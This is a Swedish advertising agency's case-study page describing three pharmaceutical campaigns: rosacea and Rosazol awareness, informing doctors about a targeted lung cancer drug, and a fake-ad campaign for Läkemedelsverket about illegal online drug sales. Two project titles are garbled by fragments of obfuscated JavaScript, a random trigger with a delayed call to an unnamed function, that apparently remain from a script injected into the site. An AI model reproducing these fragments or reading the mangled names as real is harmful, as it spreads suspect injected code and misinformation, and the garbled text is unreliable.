Case

Dyk djupare in i tre av våra projekt och få reda på strategin och koncepten bakom kampanjerna.

Roandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}sazol

Webb/Print/Förpackning/Utbildning

Vi tog fram ett koncept som genom annonser, hemsida och broschyrer skulle hjälpa till att upplysa om hudsjukdomen rosacea och det receptfria läkemedlet Rosazol.

Iresandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}sa

Webb/Print/Film/Event

Med den här kampanjen ville vi upplysa läkarna om att lungcancerpatienter med en viss genmutation kunde passa för ett nytt målsökande läkemedel med färre biverkningar.

Läkemedelsverket

Webb/Print/Film/PR

Med en fejkad reklamkampanj för receptbelagda läkemedel ville vi få människor att själva inse faran med att köpa läkemedel från illegala sajter på nätet.